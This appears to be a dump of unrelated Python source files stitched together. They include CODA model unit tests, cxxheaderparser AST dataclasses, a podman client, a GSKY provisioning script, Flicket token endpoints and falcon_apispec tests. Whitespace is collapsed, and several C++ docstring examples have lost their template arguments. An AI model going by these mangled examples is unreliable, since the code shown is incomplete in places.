""" inst = models.CODA() mock1 = mock.Mock() mock1.name = 'Requirement0' mock3 = mock.Mock() mock3.name = 'Requirement1' inst._requirements = (mock1,mock3) mock2 = mock.Mock() mock2.name = 'Characteristic0' inst._characteristics = (mock2,) if exception is None: inst.add_relationship(rlkup, clkup, 'max', 1.0, 1.0) r = rlkup if isinstance(rlkup, int) else int(rlkup[-1]) self.assertIsInstance(inst.matrix[r,0], models.CODAMaximise) else: self.assertRaises(exception, inst.add_relationship, rlkup, clkup, 'max', 1.0, 1.0) @mock.patch.object(models.CODA, 'add_relationship') @mock.patch.object(models.CODA, 'add_characteristic') @mock.patch.object(models.CODA, 'add_requirement') def test_read_excel(self, mock_add_requirement, mock_add_characteristic, mock_add_relationship): """Constructor adds elements in turn from the parser. The parser provides three methods: - get_requirements - get_characteristics - get_relationships These all return records defined within io.CODASheet. The constructor calls these methods on the parser and uses the results to feed arguments to the add_requirement, add_characteristic and add_relationship methods on the CODA class. This unit test mocks the parser and ensures the known return values for these get methods are passed to the add methods in the correct fashion. """ dummy_records = { 'requirements': [ io.CODASheet.ReqRecord('Requirement 1', 0.33), io.CODASheet.ReqRecord('Requirement 2', 0.5), io.CODASheet.ReqRecord('Requirement 3', 0.17), ], 'characteristics': [ io.CODASheet.CDefRecord('Characteristic 1', 1, 5), io.CODASheet.CDefRecord('Characteristic 2', 10, 20), ], 'relationships': [ io.CODASheet.MinMaxRelRecord( 'Requirement 1', 'Characteristic 1', 'min', '---', # TODO: Remove redundant information 3 ), io.CODASheet.OptRelRecord( 'Requirement 2', 'Characteristic 1', 'opt', 'ooo', 13, 1, ), io.CODASheet.MinMaxRelRecord( 'Requirement 3', 'Characteristic 2', 'max', '+++', 3 ), ] } stub_parser = mock.MagicMock(spec_set=io.CompactExcelParser) for s in 'requirements', 'characteristics', 'relationships': method = getattr(stub_parser, 'get_{}'.format(s)) method.return_value = dummy_records[s] mock_parser_class = mock.Mock() mock_parser_class.return_value = stub_parser sut = models.CODA.read_excel('/dummy/path', parser_class=mock_parser_class) mock_parser_class.assert_called_once_with('/dummy/path') mock_add_requirement.assert_has_calls([ mock.call('Requirement 1', 0.33), mock.call('Requirement 2', 0.5), mock.call('Requirement 3', 0.17), ]) mock_add_characteristic.assert_has_calls([ mock.call('Characteristic 1', (1, 5)), mock.call('Characteristic 2', (10, 20)), ]) mock_add_relationship.assert_has_calls([ mock.call('Requirement 1', 'Characteristic 1', 'min', '---', 3), mock.call('Requirement 2', 'Characteristic 1', 'opt', 'ooo', 13, 1), mock.call('Requirement 3', 'Characteristic 2', 'max', '+++', 3), ]) def test__merit(self): """Returns a matrix of merit values for design relationships. Each design relationship is a model providing a fractional decimal value representing the degree to which a requirement is satisfied by a given characteristic parameter value. This should therefore be the same dimensions as the overall coda model, i.e. (n, m) where n is the number of requirements, and m the number of characteristics. "Internal" method because raw merit values are not considered particularly useful on their own at this point. 
""" self.assertIsInstance(self.inst._merit(), np.ndarray) self.assertEqual(self.inst._merit().ndim, 2) self.assertEqual(self.inst._merit().shape, self.inst.shape) self.assertTrue((self.inst._merit()==self.merit).all()) class TestCODACaseStudy1(unittest.TestCase): """Case study of a bicycle wheel design based on ref 1.""" def setUp(self): wheel = self.wheel = models.CODA() self._setup_requirements() self._setup_characteristics() self._setup_relationships() def _setup_requirements(self): wheel = self.wheel for name in ('Stiffness', 'Friction', 'Weight', 'Manufacturability', 'Repairability'): wheel.add_requirement(name, 0.2) def _setup_characteristics(self): wheel = self.wheel wheel.add_characteristic('Tyre Diameter', (24, 29), 24) wheel.add_characteristic('Tyre Width', (11, 18), 13) wheel.add_characteristic('Spoke Thickness', (2.8, 5), 4.3) wheel.add_characteristic('Use of Composites', (0.05, 0.8), 0.2) def _setup_relationships(self): wheel = self.wheel reqt = 'Stiffness' wheel.add_relationship(reqt, 0, 'min', 'strong', 29) wheel.add_relationship(reqt, 1, 'max', 'moderate', 12) wheel.add_relationship(reqt, 2, 'max', 'strong', 3) wheel.add_relationship(reqt, 3, 'opt', 'moderate', 0.5, 0.2) reqt = 'Friction' wheel.add_relationship(reqt, 'Tyre Diameter', 'max', 'moderate', 25) wheel.add_relationship(reqt, 'Tyre Width', 'max', 'strong', 11) reqt = 'Weight' wheel.add_relationship(reqt, 'Tyre Diameter', 'min', 'strong', 26) wheel.add_relationship(reqt, 'Tyre Width', 'min', 'strong', 15) wheel.add_relationship(reqt, 'Spoke Thickness', 'min', 'moderate', 3.5) wheel.add_relationship(reqt, 'Use of Composites', 'max', 'strong', 0.3) reqt = 'Manufacturability' wheel.add_relationship(reqt, 'Tyre Width', 'max', 'weak', 12) wheel.add_relationship(reqt, 'Spoke Thickness', 'max', 'moderate', 2.9) wheel.add_relationship(reqt, 'Use of Composites', 'min', 'strong', 0.5) reqt = 'Repairability' wheel.add_relationship(reqt, 'Tyre Width', 'max', 'weak', 14) wheel.add_relationship(reqt, 'Spoke Thickness', 'max', 'moderate', 3.8) wheel.add_relationship(reqt, 'Use of Composites', 'min', 'strong', 0.25) def test_merit(self): self.assertAlmostEqual(self.wheel.merit, .5788, places=4) def test_sum_of_correlations(self): """Sum of correlation factors for all requirements.""" np.testing.assert_array_almost_equal( self.wheel.correlation.sum(axis=1, keepdims=True), np.array([[2.4, 1.2, 3.0, 1.3, 1.3]]).T ) def test_read_excel(self): try: import pandas import xlrd except ImportError: self.skipTest("`pandas` and `xlrd` required for " "spreadsheet parsing") model = models.CODA.read_excel( os.path.join(DATA_DIR, 'demo_model_casestudy1.xlsx') ) for char, ref in zip(model.characteristics, self.wheel.characteristics): char.value = ref.value self.assertEqual(self.wheel.merit, model.merit) @ddt class TestCODACharacteristic(unittest.TestCase): def setUp(self): class CODACharacteristic(models.CODACharacteristic): def __init__(self): pass self.inst = CODACharacteristic() def test___init____omit_value(self): """Omitting the value on instantiation is valid. When modelling a set of designs (typical) we don't necessarily want to seed the model with characteristic values. """ inst = models.CODACharacteristic('Name') # This might want to be None? Requires everything supporting # that as an input though. 
self.assertRaises(AttributeError, getattr, inst, 'value') @data( (-0.01, ValueError), (0.0, None), (0.5, None), (1.0, None), (1.01, ValueError), ) @unpack def test_value__set_with_default_limits(self, value, exception): if exception is not None: self.assertRaises(exception, setattr, self.inst, 'value', value) else: self.inst.value = value self.assertEqual(self.inst.value, value) def test_limits__get__default(self): self.assertEqual(self.inst.limits, self.inst._default_limits) @data((0.0, 1.0), [0.0, 1.0], (None, None), (0, None), (None, 1)) def test_limits__set__valid(self, value): self.inst.limits = value self.assertEqual(self.inst.limits, tuple(value)) @ddt class TestCODARequirement(unittest.TestCase): def setUp(self): class CODARequirement(models.CODARequirement): def __init__(self): pass self.inst = CODARequirement() @data((-0.01, False), (0.0, True), (0.5, True), (1.0, True), (1.1, False)) @unpack def test_weight__set(self, wt, valid): # Prototypes used context to allow weights to be provided in a # non-normalised form and this property would handle the # normalisation by inspecting the weights of other # requirements. This functionality isn't implemented here, but # might still be useful. if not valid: self.assertRaises(ValueError, setattr, self.inst, 'weight', wt) else: self.inst.weight = wt self.assertEqual(self.inst.weight, wt) @ddt class TestCODARelationship(unittest.TestCase): def setUp(self): class Concrete(models.CODARelationship): def __init__(self): pass def __call__(self, x): return 0.0 self.cls = Concrete self.inst = Concrete() @data([0.0, 0.0, True], [0.1, 0.1, True], [0.3, 0.3, True], [0.9, 0.9, True], [1.0, 0.1, True], [0.25, None, False], [-0.1, None, False], [0, 0.0, True], [1, 0.1, True], [3, 0.3, True], [9, 0.9, True], ['none', 0.0, True], [None, 0.0, True], ['weak', 0.1, True], ['moderate', 0.3, True], ['medium', 0.3, True], ['strong', 0.9, True], ['---', 0.9, True], ['+++', 0.9, True], ['ooo', 0.9, True], ['--', 0.3, True], ['++', 0.3, True], ['oo', 0.3, True], ['o', 0.1, True], ['o', 0.1, True], ['o', 0.1, True], ) @unpack def test_correlation(self, value, internal_value, valid): """Correlation value must be one of a restricted set.""" # TODO: It might be more flexible to enforce this further up # for different scaling systems. Could also be done with # a mixin implementation implementation self.assertRaises(AttributeError, getattr, self.inst, 'correlation') if valid: self.inst.correlation = value self.assertEqual(self.inst.correlation, internal_value) else: self.assertRaises(ValueError, setattr, self.inst, 'correlation', value) def test_target(self): """Target value may be anything, but check it's settable.""" self.assertRaises(AttributeError, getattr, self.inst, 'target') self.inst.target = 0.0 self.assertEqual(self.inst.target, 0.0) class TestCODANull(unittest.TestCase): def test___init__(self): """Takes no arguments, has a correlation and merit of zero.""" null = models.CODANull() self.assertEqual(null.correlation, 0.0) self.assertIs(null.target, None) self.assertEqual(null(None), 0.0) def test__attributes_not_settable(self): null = models.CODANull() self.assertRaises(TypeError, setattr, null, 'correlation', 1) self.assertRaises(TypeError, setattr, null, 'target', 1) class TestCODAMaximise(unittest.TestCase): # TODO: compare function over range. 
def test_merit(self): inst = models.CODAMaximise(target=1.0, correlation=None) self.assertAlmostEqual(inst(1.0), 0.5) self.assertLess(inst(0.1), 0.5) self.assertGreater(inst(2.0), 0.5) class TestCODAMinimise(unittest.TestCase): # TODO: compare function over range. def test_merit(self): inst = models.CODAMinimise(target=1.0, correlation=None) self.assertAlmostEqual(inst(1.0), 0.5) self.assertGreater(inst(0.1), 0.5) self.assertLess(inst(2.0), 0.5) class TestCODAOptimise(unittest.TestCase): # TODO: compare function over range. def test_merit(self): inst = models.CODAOptimise(target=1.0, correlation=None, tolerance=0.2) self.assertAlmostEqual(inst(0.8), 0.5) self.assertAlmostEqual(inst(1.2), 0.5) self.assertAlmostEqual(inst(1.0), 1.0) self.assertGreater(inst(1.1), 0.5) self.assertGreater(inst(0.9), 0.5) self.assertLess(inst(2.0), 0.5) self.assertLess(inst(0.0), 0.5) if __name__ == '__main__': unittest.main() dasbaumwolltier/journald-monitorjournald_monitor/__init__.py from .journald_monitor import JournaldMonitor michelp/cxxheaderparser import typing from dataclasses import dataclass, field @dataclass class Token: """ In an ideal world, this Token class would not be exposed via the user visible API. Unfortunately, getting to that point would take a significant amount of effort. It is not expected that these will change, but they might. At the moment, the only supported use of Token objects are in conjunction with the ``tokfmt`` function. As this library matures, we'll try to clarify the expectations around these. File an issue on github if you have ideas! """ #: Raw value of the token value: str #: Lex type of the token type: str = field(repr=False, compare=False, default="") @dataclass class Value: """ A unparsed list of tokens .. code-block:: c++ int x = 0x1337; ~~~~~~ """ #: Tokens corresponding to the value tokens: typing.List[Token] @dataclass class NamespaceDecl: """ Namespace declarations .. code-block:: c++ namespace foo::bar {} ~~~~~~~~ """ #: These are the names (split by ::) for this namespace declaration, #: but does not include any parent namespace names #: #: An anonymous namespace is an empty list names: typing.List[str] inline: bool = False @dataclass class DecltypeSpecifier: """ Contents of a decltype (inside the parentheses) .. code-block:: c++ decltype(Foo::Bar) ~~~~~~~~ """ #: Unparsed tokens within the decltype tokens: typing.List[Token] @dataclass class FundamentalSpecifier: """ A specifier that only contains fundamental types """ name: str @dataclass class NameSpecifier: """ An individual segment of a type name .. code-block:: c++ Foo::Bar ~~~ """ name: str specialization: typing.Optional["TemplateSpecialization"] = None @dataclass class AutoSpecifier: """ Used for an auto return type """ name: str = "auto" @dataclass class AnonymousName: """ A name for an anonymous class, such as in a typedef. There is no string associated with this name, only an integer id. Things that share the same anonymous name have anonymous name instances with the same id """ #: Unique id associated with this name (only unique per parser instance!) id: int PQNameSegment = typing.Union[ AnonymousName, FundamentalSpecifier, NameSpecifier, DecltypeSpecifier, AutoSpecifier ] @dataclass class PQName: """ Possibly qualified name of a C++ type. """ #: All of the segments of the name. This is always guaranteed to have at #: least one element in it. 
Name is segmented by '::' #: #: If a name refers to the global namespace, the first segment will be an #: empty NameSpecifier segments: typing.List[PQNameSegment] #: Set if the name starts with class/enum/struct classkey: typing.Optional[str] = None #: Set to true if the type was preceded with 'typename' has_typename: bool = False @dataclass class Enumerator: """ An individual value of an enumeration """ #: The enumerator key name name: str #: None if not explicitly specified value: typing.Optional[Value] = None #: Documentation if present doxygen: typing.Optional[str] = None @dataclass class EnumDecl: """ An enumeration type """ typename: PQName values: typing.List[Enumerator] base: typing.Optional[PQName] = None #: Documentation if present doxygen: typing.Optional[str] = None #: If within a class, the access level for this decl access: typing.Optional[str] = None @dataclass class TemplateArgument: """ A single argument for a template specialization .. code-block:: c++ Foo ~~~ """ #: If this argument is a type, it is stored here as a DecoratedType, #: otherwise it's stored as an unparsed set of values arg: typing.Union["DecoratedType", Value] param_pack: bool = False @dataclass class TemplateSpecialization: """ Contains the arguments of a template specialization .. code-block:: c++ Foo ~~~~~~~~~~~ """ args: typing.List[TemplateArgument] @dataclass class FunctionType: """ A function type, currently only used in a function pointer .. note:: There can only be one of FunctionType or Type in a DecoratedType chain """ return_type: "DecoratedType" parameters: typing.List["Parameter"] #: If a member function pointer # TODO classname: typing.Optional[PQName] #: Set to True if ends with ``...`` vararg: bool = False #: True if function has a trailing return type (``auto foo() -> int``). #: In this case, the 'auto' return type is removed and replaced with #: whatever the trailing return type was has_trailing_return: bool = False @dataclass class Type: """ A type with a name associated with it """ typename: PQName const: bool = False volatile: bool = False @dataclass class Array: """ Information about an array. Multidimensional arrays are represented as an array of array. """ #: The type that this is an array of array_of: typing.Union["Array", "Pointer", Type] #: Size of the array #: #: .. code-block:: c++ #: #: int x[10]; #: ~~ size: typing.Optional[Value] @dataclass class Pointer: """ A pointer """ #: Thing that this points to ptr_to: typing.Union[Array, FunctionType, "Pointer", Type] const: bool = False volatile: bool = False @dataclass class Reference: """ A lvalue (``&``) reference """ ref_to: typing.Union[Array, Pointer, Type] @dataclass class MoveReference: """ An rvalue (``&&``) reference """ moveref_to: typing.Union[Array, Pointer, Type] #: A type or function type that is decorated with various things #: #: .. note:: There can only be one of FunctionType or Type in a DecoratedType #: chain DecoratedType = typing.Union[Array, Pointer, MoveReference, Reference, Type] @dataclass class TemplateNonTypeParam: """ .. code-block:: c++ template ~~~~~ template ~~~~~~~~~~~~~~~~~~~ template ~~~~~~ """ type: DecoratedType name: typing.Optional[str] = None default: typing.Optional[Value] = None #: Contains a ``...`` param_pack: bool = False @dataclass class TemplateTypeParam: """ .. 
code-block:: c++ template ~~~~~~~~~~ """ #: 'typename' or 'class' typekey: str name: typing.Optional[str] = None param_pack: bool = False default: typing.Optional[Value] = None #: A template-template param template: typing.Optional["TemplateDecl"] = None #: A parameter for a template declaration #: #: .. code-block:: c++ #: #: template #: ~~~~~~~~~~ TemplateParam = typing.Union[TemplateNonTypeParam, TemplateTypeParam] @dataclass class TemplateDecl: """ Template declaration for a function or class .. code-block:: c++ template class Foo {}; template T fn(); """ params: typing.List[TemplateParam] = field(default_factory=list) @dataclass class ForwardDecl: """ Represents a forward declaration of a user defined type """ typename: PQName template: typing.Optional[TemplateDecl] = None doxygen: typing.Optional[str] = None #: Set if this is a forward declaration of an enum and it has a base enum_base: typing.Optional[PQName] = None #: If within a class, the access level for this decl access: typing.Optional[str] = None @dataclass class BaseClass: """ Base class declarations for a class """ #: access specifier for this base access: str #: possibly qualified type name for the base typename: PQName #: Virtual inheritance virtual: bool = False #: Contains a ``...`` param_pack: bool = False @dataclass class ClassDecl: """ A class is a user defined type (class/struct/union) """ typename: PQName bases: typing.List[BaseClass] = field(default_factory=list) template: typing.Optional[TemplateDecl] = None explicit: bool = False final: bool = False doxygen: typing.Optional[str] = None #: If within a class, the access level for this decl access: typing.Optional[str] = None @property def classkey(self) -> typing.Optional[str]: return self.typename.classkey @dataclass class Parameter: """ A parameter of a function/method """ type: DecoratedType name: typing.Optional[str] = None default: typing.Optional[Value] = None param_pack: bool = False @dataclass class Function: """ A function declaration, potentially with the function body """ return_type: DecoratedType name: PQName parameters: typing.List[Parameter] #: Set to True if ends with ``...`` vararg: bool = False doxygen: typing.Optional[str] = None constexpr: bool = False extern: typing.Union[bool, str] = False static: bool = False inline: bool = False #: If true, the body of the function is present has_body: bool = False #: True if function has a trailing return type (``auto foo() -> int``). #: In this case, the 'auto' return type is removed and replaced with #: whatever the trailing return type was has_trailing_return: bool = False template: typing.Optional[TemplateDecl] = None throw: typing.Optional[Value] = None noexcept: typing.Optional[Value] = None @dataclass class Method(Function): """ A method declaration, potentially with the method body """ #: constructors and destructors don't have a return type return_type: typing.Optional[DecoratedType] access: str = "" const: bool = False volatile: bool = False #: ref-qualifier for this method, either lvalue (&) or rvalue (&&) #: #: .. 
code-block:: c++ #: #: void foo() &&; #: ~~ #: ref_qualifier: typing.Optional[str] = None constructor: bool = False explicit: bool = False default: bool = False deleted: bool = False destructor: bool = False pure_virtual: bool = False virtual: bool = False final: bool = False override: bool = False @dataclass class Operator(Method): operator: str = "" @dataclass class FriendDecl: """ Represents a friend declaration -- friends can only be classes or functions """ cls: typing.Optional[ForwardDecl] = None fn: typing.Optional[Function] = None @dataclass class Typedef: """ A typedef specifier. A unique typedef specifier is created for each alias created by the typedef. .. code-block:: c++ typedef type name, *pname; """ #: The aliased type #: #: .. code-block:: c++ #: #: typedef type *pname; #: ~~~~~~ type: DecoratedType #: The alias introduced for the specified type #: #: .. code-block:: c++ #: #: typedef type *pname; #: ~~~~~ name: str #: If within a class, the access level for this decl access: typing.Optional[str] = None @dataclass class Variable: """ A variable declaration """ name: PQName type: DecoratedType value: typing.Optional[Value] = None constexpr: bool = False extern: typing.Union[bool, str] = False static: bool = False inline: bool = False #: Can occur for a static variable for a templated class template: typing.Optional[TemplateDecl] = None doxygen: typing.Optional[str] = None @dataclass class Field: """ A field of a class """ #: public/private/protected access: str type: DecoratedType name: typing.Optional[str] = None value: typing.Optional[Value] = None bits: typing.Optional[int] = None constexpr: bool = False mutable: bool = False static: bool = False doxygen: typing.Optional[str] = None @dataclass class UsingDecl: """ .. code-block:: c++ using NS::ClassName; """ typename: PQName #: If within a class, the access level for this decl access: typing.Optional[str] = None @dataclass class UsingAlias: """ .. code-block:: c++ using foo = int; template using VectorT = std::vector; """ alias: str type: DecoratedType template: typing.Optional[TemplateDecl] = None #: If within a class, the access level for this decl access: typing.Optional[str] = None gtmanfred/teststack """ Client for interfacing with podman. To enable using podman as the container interface, specify the following section in the ``teststack.toml`` .. code-block:: toml [client] name = "podman" There is an extra provided to install the ``podman`` dependency. .. 
code-block:: shell python3 -m pip install teststack[podman] """ import json import os import platform import subprocess import click import podman.errors class Client: def __init__(self, machine_name=None, **kwargs): if machine_name is not None: kws = self._get_connection(machine_name) kws.update(kwargs) elif platform.system() == 'Darwin': kws = self._get_connection('*') kws.update(kwargs) else: kws = kwargs if kws: self.client = podman.PodmanClient(**kws) else: self.client = podman.from_env() def _get_connection(self, name): connections = json.loads( subprocess.check_output( [ 'podman', 'system', 'connection', 'list', '--format=json', ] ), ) for connection in connections: if connection['Name'].endswith(name): return { 'base_url': f'http+{connection["URI"]}', 'identity': connection['Identity'], } return {} def __del__(self): self.client.close() def end_container(self, name): try: container = self.client.containers.get(name) except podman.errors.NotFound: return try: container.stop() container.wait() except podman.errors.APIError: pass finally: container.remove(v=True) def container_get(self, name): try: return self.client.containers.get(name).id except podman.errors.NotFound: return None def container_get_current_image(self, name): container = self.container_get(name) if container: return self.client.containers.get(container).image.id return None def run( self, name, image, ports=None, command=None, environment=None, stream=False, user=None, volumes=None, mount_cwd=False, ): mounts = volumes or [] if mount_cwd is True: mounts.append( { 'Source': os.getcwd(), 'Destination': self.client.images.get(image).attrs['Config']['WorkingDir'], 'Mode': 'rw', } ) if command is True: command = ['/bin/tail', '-f', '/dev/null'] if ports: for port, hostport in ports.items(): if not hostport: ports[port] = None if not self.image_get(image): self.client.images.pull(image) container = self.client.containers.create( name=name, image=image, detach=True, stream=stream, ports=ports or {}, environment=environment or {}, command=command, mounts=mounts, ) container.start() container.wait(condition="running") return container.id def start(self, name): self.client.containers.get(name=name).start() def image_get(self, tag): try: return self.client.images.get(tag).id except podman.errors.ImageNotFound: return None def run_command(self, container, command): container = self.client.containers.get(container) click.echo(click.style(f'Run Command: {command}', fg='green')) socket = container.exec_run( cmd=command, tty=True, socket=True, ) for line in socket.output: click.echo(line, nl=False) def build(self, dockerfile, tag, rebuild): image, _ = self.client.images.build(path='.', dockerfile=dockerfile, tag=tag, nocache=rebuild, rm=True) return image.id def get_container_data(self, name, inside=False): data = {} try: container = self.client.containers.get(name) except podman.errors.NotFound: return None data['HOST'] = container.attrs['NetworkSettings']['IPAddress'] if inside else 'localhost' for port, port_data in container.attrs['NetworkSettings']['Ports'].items(): if inside: data[f'PORT;{port}'] = port.split('/')[0] elif port_data: data[f'PORT;{port}'] = port_data[0]['HostPort'] return data def exec(self, container): os.execvp('podman', ['podman', 'exec', '-ti', container, 'bash']) gsky_provisioning/provision_multi_node.py import argparse import os import requests import socket import time import env_configs as cfg from mas import MAS from ows import OWS from worker import Worker from gsky_config import GSKYConfig curr_path = 
os.path.dirname(os.path.realpath(__file__)) gsky_conf_dir = os.path.join(curr_path, 'test_data/gsky_conf') if not os.path.exists(gsky_conf_dir): os.makedirs(gsky_conf_dir) envs = cfg.Environment( # bin_prefix 'gsky' is the default path generated by build_gsky.py bin_prefix=os.path.join(curr_path, 'gsky'), # pg_data_prefix is the path for postgres database files. pg_data_prefix=os.path.join(curr_path, 'test_data/pg_data'), # gsky_conf_prefix is where the GSKY config.json locates. gsky_conf_prefix=gsky_conf_dir, # Unsetting or setting GSKY_GRPC_POOL_SIZE to non-positive value will be defaulted to number of cores. # Here we set it to 2 for testing purpose. GSKY_GRPC_POOL_SIZE=2, ) # test crawl file to be ingested into mas #crawl_files = ['/g/data/cm85/export/published/gsky-prod/wx7-aster.gz',] crawl_files = ['/short/z00/avs900/aster_crawls/aster-gdal-gsky-1.2.2.tsv.gz',] # Same file as above. Working # test wms url url = '%s/ows?time=2012-06-01T00:A00:A00.000Z&srs=EPSG:3857&service=WMS&version=1.1.1&request=GetMap&layers=False_Colour&bbox=13149614.84995544,-3443946.7464169003,13462700.917811524,-3130860.6785608195&width=256&height=256' % envs.envs['GSKY_OWS_HOSTNAME'] ###################################################################################### # The above code sets up the basic environment for testing purposes. # The test data including postgres data files and gsky config.json will be # written to test_data under current directory. # # The following code performs provisioning by bringing up mas, ows and workers. ###################################################################################### parser = argparse.ArgumentParser() parser.add_argument('--job_dir', default='~/gsky_dist_jobs') parser.add_argument('--services', default='ows,mas,worker') parser.add_argument('--n_workers', type=int, default=1) args = parser.parse_args() job_dir = os.path.abspath(os.path.expanduser(args.job_dir)) if not os.path.exists(job_dir): raise Exception('%s does not exist or is not accessible' % job_dir) services = [srv.strip() for srv in args.services.split(',') if len(srv.strip()) > 0] valid_services = ['ows', 'mas', 'worker'] for srv in services: if srv not in valid_services: raise Exception('invalid services: %s' % str(services)) hostname = socket.gethostname() shutdown_file = os.path.join(job_dir, 'shutdown') worker_file = os.path.join(job_dir, 'worker_%s' % hostname) mas_file = os.path.join(job_dir, 'mas_%s' % hostname) try: if 'worker' in services: worker = Worker(envs=envs.envs) worker.start() open(worker_file, 'w').close() if 'mas' in services: mas = MAS(envs=envs.envs, mode='r') mas.start() mas.ingest_data(crawl_files) open(mas_file, 'w').close() if 'ows' in services: ows = OWS(envs=envs.envs) mas_port = envs.envs['GSKY_MASAPI_PORT'] worker_port = envs.envs['GSKY_GRPC_PORT'] server_conf={ 'service_config':{ 'ows_hostname': '', 'mas_address': '', 'worker_nodes': [], }, } while True: files = [f for f in os.listdir(job_dir) if os.path.isfile(os.path.join(job_dir, f))] for f in files: if f.startswith('mas_'): mas_host = f[len('mas_'):] mas_hostname = '%s:%s' % (mas_host, mas_port) server_conf['service_config']['mas_address'] = mas_hostname if f.startswith('worker_'): worker_host = f[len('worker_'):] worker_hostname = '%s:%s' % (worker_host, worker_port) if worker_hostname not in server_conf['service_config']['worker_nodes']: server_conf['service_config']['worker_nodes'].append(worker_hostname) if len(server_conf['service_config']['worker_nodes']) >= args.n_workers: break time.sleep(3) conf = 
GSKYConfig(init_conf=server_conf, envs=envs.envs) conf_json = conf.get_config_json(conf_file=os.path.join(curr_path, 'assets/gsky_layers/aster.yaml')) with open(os.path.join(gsky_conf_dir, 'config.json'), 'w') as f: f.write(conf_json) ows.start() t0 = time.time() res = requests.get(url) t = time.time() - t0 if res.status_code == 200: with open('test_wms.png', 'wb') as f: f.write(res.content) print('%s -> test_wms.png (%.3f secs)' % (url, t)) else: raise Exception(res.text) if 'ows' not in services and ('worker' in services or 'mas' in services): while True: if os.path.exists(shutdown_file): break time.sleep(3) finally: if 'ows' in services: ows.stop() open(shutdown_file, 'w').close() if 'mas' in services: mas.stop() if 'worker' in services: worker.stop() #! python3 # -*- coding: utf-8 -*- # # Flicket - copyright : """ Authentication / Tokens ======================= Get Token ~~~~~~~~~ The user will need to provide their username and password to retrieve an authentictaion token. The authentication token is required to access all other parts of the API. .. code-block:: # example using httpie http --auth : POST http://localhost:5000/flicket-api/tokens **Response** .. sourcecode:: http HTTP/1.0 200 OK Content-Length: 50 Content-Type: application/json Date: Sat, 29 Sep 2018 14:01:00 GMT Server: Werkzeug/0.14.1 Python/3.6.5 { "token": "" } Delete Token ~~~~~~~~~~~~ .. code-block:: # example using httpie http DELETE http://localhost:5000/flicket-api/tokens "Authorization: Bearer " **Responds** .. sourcecode:: http HTTP/1.0 204 NO CONTENT Content-Length: 0 Content-Type: text/html; charset=utf-8 Date: Sat, 29 Sep 2018 14:13:19 GMT Server: Werkzeug/0.14.1 Python/3.6.5 """ from flask import g, jsonify from .sphinx_helper import api_url from . import bp_api from application import app, db from application.flicket_api.views.auth import basic_auth, token_auth @bp_api.route(api_url + 'tokens', methods=['POST']) @basic_auth.login_required def get_token(): token = g.current_user.get_token() db.session.commit() return jsonify({'token': token}) @bp_api.route(api_url + 'tokens', methods=['DELETE']) @token_auth.login_required def revoke_token(): g.current_user.revoke_token() db.session.commit() return '', 204 import unittest import sys sys.path.append('../../cocytus') import cocytus as cqt ini_path = 'cocytus/ini/' class InifileTest(unittest.TestCase): def test_normal(self): config = cqt.open_inifile(ini_path + 'ok.ini') self.assertTrue(cqt.check_config(config)) def test_err(self): config = cqt.open_inifile(ini_path + 'err0.ini') self.assertFalse(cqt.check_config(config)) config = cqt.open_inifile(ini_path + 'err1.ini') self.assertFalse(cqt.check_config(config)) if __name__ == '__main__': unittest.main() # -*- coding: utf-8 -*- from benedict.core import clone def filter(d, predicate): if not callable(predicate): raise ValueError('predicate argument must be a callable.') new_dict = clone(d, empty=True) keys = list(d.keys()) for key in keys: value = d.get(key, None) if predicate(key, value): new_dict[key] = value return new_dict import falcon import pytest from apispec import APISpec from apispec.exceptions import APISpecError from unittest.mock import MagicMock from falcon_apispec import FalconPlugin @pytest.fixture def suffixed_resource(): class SuffixedResource: def on_get_hello(self): """A greeting endpoint. --- description: get a greeting responses: 200: description: said hi """ return "dummy_hello" def on_get(self): """An invalid method. --- description: get something responses: 200: description: said ??? 
""" return "dummy" return SuffixedResource() @pytest.fixture() def spec_factory(): def _spec(app): return APISpec( title="Swagger Petstore", version="1.0.0", openapi_version="3.0.2", description="This is a sample Petstore server. You can find out " 'more about Swagger at ' "http://swagger.wordnik.com or on irc.freenode.net, #swagger." 'For this sample, you can use the api key "special-key" to test ' "the authorization filters", plugins=[FalconPlugin(app)], ) return _spec @pytest.fixture() def app(): falcon_app = falcon.API() return falcon_app class TestPathHelpers: def test_gettable_resource(self, app, spec_factory): class HelloResource: def on_get(self, req, resp): """A greeting endpoint. --- description: get a greeting responses: 200: description: said hi """ return "dummy" expected = { "description": "get a greeting", "responses": {"200": {"description": "said hi"}}, } hello_resource = HelloResource() app.add_route("/hi", hello_resource) spec = spec_factory(app) spec.path(resource=hello_resource) assert spec._paths["/hi"]["get"] == expected def test_posttable_resource(self, app, spec_factory): class HelloResource: def on_post(self, req, resp): """A greeting endpoint. --- description: get a greeting responses: 201: description: posted something """ return "hi" expected = { "description": "get a greeting", "responses": {"201": {"description": "posted something"}}, } hello_resource = HelloResource() app.add_route("/hi", hello_resource) spec = spec_factory(app) spec.path(resource=hello_resource) assert spec._paths["/hi"]["post"] == expected def test_resource_with_metadata(self, app, spec_factory): class HelloResource: """Greeting API. --- x-extension: global metadata """ hello_resource = HelloResource() app.add_route("/hi", hello_resource) spec = spec_factory(app) spec.path(resource=hello_resource) assert spec._paths["/hi"]["x-extension"] == "global metadata" def test_resource_no_methods(self, app, spec_factory): class HelloResource: """Greeting API. --- x-extension: global metadata """ hello_resource = HelloResource() magic_route = MagicMock(uri_template="/hi", resource=hello_resource, method_map=[]) app._router._roots.append(magic_route) spec = spec_factory(app) spec.path(resource=hello_resource) assert spec._paths["/hi"]["x-extension"] == "global metadata" def test_unredundant_basepath_resource_with_slash(self, app, spec_factory): class HelloResource: def on_get(self, req, resp): """A greeting endpoint. --- description: get a greeting responses: 200: description: said hi """ return "dummy" expected = { "description": "get a greeting", "responses": {"200": {"description": "said hi"}}, } hello_resource = HelloResource() app.add_route("/v1/foo/v1", hello_resource) spec = spec_factory(app) base_path = '/v1' spec.path(resource=hello_resource, base_path=base_path) assert spec._paths["/foo/v1"]["get"] == expected def test_unredundant_basepath_resource_wo_slash(self, app, spec_factory): class HelloResource: def on_get(self, req, resp): """A greeting endpoint. 
